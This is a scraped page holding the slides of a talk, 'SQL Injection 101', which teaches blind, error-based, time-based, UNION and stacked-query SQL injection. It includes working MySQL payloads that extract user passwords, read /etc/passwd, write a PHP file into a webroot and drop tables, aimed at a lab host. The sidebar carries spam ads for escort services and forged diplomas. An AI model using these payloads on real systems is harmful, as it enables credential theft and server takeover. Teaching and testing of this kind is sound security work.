Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Cizo Technology Services
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 

Recently uploaded (20)

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
Cyber security and its impact on E commerce
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

  • 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  • 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  • 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
  • 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
  • 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
  • 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
  • 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
  • 9. Tool == Super Easy ?
  • 10. Tool == Super Easy ?
  • 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
  • 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
  • 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  • 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
  • 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
  • 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
  • 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
  • 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
  • 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
  • 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
  • 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
  • 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
  • 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
  • 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  • 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
  • 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
  • 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
  • 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  • 30. Time-based blind : Exploit sleep() executed !
  • 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
  • 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
  • 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
  • 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
  • 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
  • 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
  • 38. Stacked queries : Exploit
  • 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
  • 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  • 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  • 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
  • 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
  • 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/